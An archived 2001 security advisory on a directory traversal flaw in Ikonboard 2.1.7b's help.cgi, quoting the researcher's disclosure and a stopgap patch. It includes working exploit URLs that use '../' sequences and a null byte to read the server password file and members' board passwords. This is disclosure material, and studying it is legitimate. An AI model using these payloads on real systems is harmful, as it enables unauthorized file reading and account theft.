SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Ikonboard Vendors:   Ikonboard.com
Ikonboard Bulletin Board Software Allows Remote Viewing of Files and Directories Outside of The Software's Root Directory
SecurityTracker Alert ID:  1001068
SecurityTracker URL:  http://securitytracker.com/id/1001068
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 12 2001
Impact:   User access via network
Exploit Included:  Yes  
Version(s): 2.1.7b
Description:   It is reported that Ikonboard bulletin board software for web sites contains a vulnerability that allows remote users to view files on the server that reside outside of the product's root directory.

The problem reportedly resides in the help.cgi file which does not fileter out the backslash or ".." characters. This allows the attacker to specify any path on the system.

Some demonstration exploit URL formats are provided in the original report.

The vendor has been contacted.

Impact:   A remote user with access to the web server could request and view files and directories outside of Ikonboard's root directory.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ikondiscussion.com/ikonboard/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (NT), Windows (2000)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Re: Ikonboard Bulletin Board Software Allows Remote Viewing of Files and Directories Outside of The Software's Root Directory
A user reports their personal fix for this vulnerability.



 Source Message Contents

Subject:  Ikonboard v2.1.7b "show files" vulnerability


-[ Product: Ikonboard
-[ Version: 2.1.7b
-[ OS: Unix, NT
-[ Vendor: Notified, http://www.ikonboard.com

-=[ Summary ]=-

This is another bug in the Ikonboard.
Anyone can read any file on the remote system with
the privileges of the web server.

-=[ Problem ]=-

File: help.cgi

---[L.44]---
$inhelpon = $query -> param('helpon');
---
As we can see, $inhelpon is the input for 'helpon'

---[L.95-97]---
$filetoopen = "$ikondir" . "help/$inhelpon.dat";
$filetoopen = &stripMETA($filetoopen);
open (FILE, "$filetoopen") or die "Cannot locate the required files";
---
Well, it sets the file, runs it through the filter and opens it.
-> $inhelpon, remember?! ;)

Ok, i am not going to post the whole filter it uses because they really
have
been able to write a filter that is 24 lines long.
And they finally forgot to filter the backslash, so we can easily just
attach the 'poison null-byte' to '$inhelpon' and we escape the '.dat'.
And of course the scripts doesn't check for "..", so we can specifiy
every
path we want.

-=[ Exploit ]=-

Example:

http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00
- would show the password file, if it is readable with the privileges of
the
  web server.

http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../members/<member>.cgi%00
- replace <member> with the member name and it shows you his/her
board-password.
  (works with Administrator accounts too)

-=[ Patches ]=-

Not yet available.
You could fix the script temporary by inserting the following line under
line 45 in 'help.cgi':

$inhelpon =~ s/\///g;

This is lame, but it works.

-=[ Greetings ]=-

Neilk - learned alot from you!
Marc Ruef - I promised it ;)
DukeCS - thanks for everything!
Marko - thanks for your help!
Tribunal - you taught me alot, thanks
ICB - long time no speak
Svoern - "go get 'em" ;)


So long,

Martin J. Muench <muench@gmc-online.de>
http://mjm.gmc-online.de
http://www.german-secure.de

"Perl - The only language that looks the same before and after RSA
encryption."
- Keith Bostic


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC